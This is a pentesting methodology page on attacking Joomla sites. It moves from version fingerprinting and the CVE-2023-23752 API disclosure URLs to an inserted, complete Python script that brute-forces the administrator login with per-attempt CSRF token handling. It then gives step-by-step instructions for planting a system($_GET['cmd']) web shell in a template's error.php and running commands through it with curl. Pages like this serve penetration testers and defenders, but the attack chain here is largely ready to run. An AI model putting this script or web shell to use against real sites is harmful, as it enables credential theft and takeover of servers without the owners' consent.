Joomla
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Joomla Statistics
Joomla collects anonymous usage statistics such as the breakdown of Joomla, PHP and database versions and the server operating systems in use across Joomla installations. These statistics can be queried through their public API.
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
Enumeration
Discovery/Footprinting
- Check the meta generator tag
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
Version
- In /administrator/manifests/files/joomla.xml you can see the version.
- In /language/en-GB/en-GB.xml you can find the Joomla version.
- In plugins/system/cache/cache.xml you can see an approximate version (it is the plugin's own version, so it only narrows down the major release).
Automated
droopescan scan joomla --url http://joomla-site.local/
In 80,443 - Pentesting Web Methodology there is a section about CMS scanners that can scan Joomla.
API Unauthenticated Information Disclosure:
Versions from 4.0.0 to 4.2.7 are vulnerable to unauthenticated information disclosure (CVE-2023-23752): the web services API accepts public=true on endpoints that should require authentication and returns the database credentials and other configuration values, plus the user list.
- Users:
http://<host>/api/v1/users?public=true
- Config File:
http://<host>/api/index.php/v1/config/application?public=true
MSF module: scanner/http/joomla_api_improper_access_checks
or the Ruby script 51334 (Exploit-DB ID)
Brute-Force
You can use this script to try to brute force the login.
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
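A plain POST loop does not work against Joomla: the login form carries an anti-CSRF token (a hidden input whose name is a 32-hex-character string and whose value is 1) bound to the session cookie, and a POST without a valid one is rejected before the credentials are checked. The script below is an added example for this page, not the page's joomla-brute.py: for every attempt it fetches /administrator/index.php, parses the token and the return field out of the form, and replays them with the session cookies. The target URL, wordlist path, function names, the success heuristic and the sample form fragment are assumptions/constructed.

```python
"""Joomla administrator login brute force with per-attempt CSRF token handling.

Added example for this page; it is not the joomla-brute.py script the page uses.
Target URL, wordlist, the success heuristic and SAMPLE_FORM are assumptions/constructed.
"""
import http.cookiejar
import re
import urllib.parse
import urllib.request
from typing import Optional, Tuple

# Hidden anti-CSRF field: name is 32 hex chars, value is always "1".
TOKEN_RE = re.compile(r'name="([0-9a-f]{32})"\s+value="1"')
# Base64 of the page to return to after login (default "index.php").
RETURN_RE = re.compile(r'name="return"\s+value="([A-Za-z0-9+/=]+)"')
DEFAULT_RETURN = "aW5kZXgucGhw"  # base64("index.php")

# Constructed fragment of the /administrator/index.php login form.
SAMPLE_FORM = """
<form action="/administrator/index.php" method="post" id="form-login">
  <input name="username" type="text" />
  <input name="passwd" type="password" />
  <input type="hidden" name="option" value="com_login">
  <input type="hidden" name="task" value="login">
  <input type="hidden" name="return" value="aW5kZXgucGhw">
  <input type="hidden" name="0123456789abcdef0123456789abcdef" value="1">
</form>
"""


def parse_form(html: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (csrf_token_name, return_value); (None, None) if no login form is present."""
    t = TOKEN_RE.search(html)
    r = RETURN_RE.search(html)
    return (t.group(1) if t else None, r.group(1) if r else None)


def build_login_body(username: str, password: str, token: str,
                     return_value: str = DEFAULT_RETURN) -> bytes:
    """Encode the fields the admin login form submits, including the token as <name>=1."""
    fields = {"username": username, "passwd": password, "option": "com_login",
              "task": "login", "return": return_value, token: "1"}
    return urllib.parse.urlencode(fields).encode()


def looks_logged_in(html: str) -> bool:
    """Heuristic (assumption): a failed login re-renders form-login, a success shows a logout link."""
    return 'id="form-login"' not in html and "task=logout" in html


def try_login(base_url: str, username: str, password: str, timeout: float = 10.0) -> bool:
    """One attempt: fetch the form for a fresh token + session cookie, then POST the credentials."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login_url = base_url.rstrip("/") + "/administrator/index.php"
    with opener.open(login_url, timeout=timeout) as resp:
        token, ret = parse_form(resp.read().decode("utf-8", errors="replace"))
    if token is None:
        raise RuntimeError("no CSRF token in response; not a Joomla admin login page?")
    body = build_login_body(username, password, token, ret or DEFAULT_RETURN)
    with opener.open(login_url, data=body, timeout=timeout) as resp:
        return looks_logged_in(resp.read().decode("utf-8", errors="replace"))


def brute_force(base_url: str, username: str, wordlist_path: str) -> Optional[str]:
    """Return the first password that logs in, or None when the wordlist is exhausted."""
    with open(wordlist_path, encoding="utf-8", errors="ignore") as fh:
        for line in fh:
            candidate = line.rstrip("\r\n")
            if candidate and try_login(base_url, username, candidate):
                return candidate
    return None


if __name__ == "__main__":
    import sys

    url, user, wordlist = sys.argv[1:4]
    hit = brute_force(url, user, wordlist)
    print(f"{user}:{hit}" if hit else "no valid password found")
```

Usage: `python3 joomla_admin_brute.py http://joomla-site.local/ admin /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt`. Joomla creates a new session on every form fetch, so the token/cookie pair must be refreshed per attempt as done above; reusing one token across attempts fails silently with the same "invalid token" page rather than a wrong-password error.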
RCE
If you managed to get admin credentials you can get RCE by adding a snippet of PHP code to a template, which is writable from the admin panel's template editor:
- Click on Templates at the bottom left under Configuration to bring up the templates menu.
- Click on the template name. Let's choose protostar under the Template column header. This takes us to the Templates: Customise page. (protostar is the Joomla 3 default template; Joomla 4 and 5 ship cassiopeia instead, and the same edit works there.)
- Finally, click on a page to bring up its source. Let's choose error.php. Add a PHP one-liner to gain code execution: system($_GET['cmd']); Put it inside a <?php ... ?> block and before the defined('_JEXEC') or die; guard, because a direct request to the template file never defines _JEXEC and would otherwise die before reaching your code.
- Save & Close
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
From XSS to RCE
- JoomSploit: a Joomla exploitation script that can escalate XSS to RCE or other critical vulnerabilities. For more info check this post. It supports Joomla versions 5.X.X, 4.X.X and 3.X.X and allows:
- Privilege Escalation: creates a user in Joomla.
- (RCE) Built-In Templates Edit: edits the built-in templates in Joomla.
- (Custom) Custom Exploits: custom exploits for third-party Joomla plugins.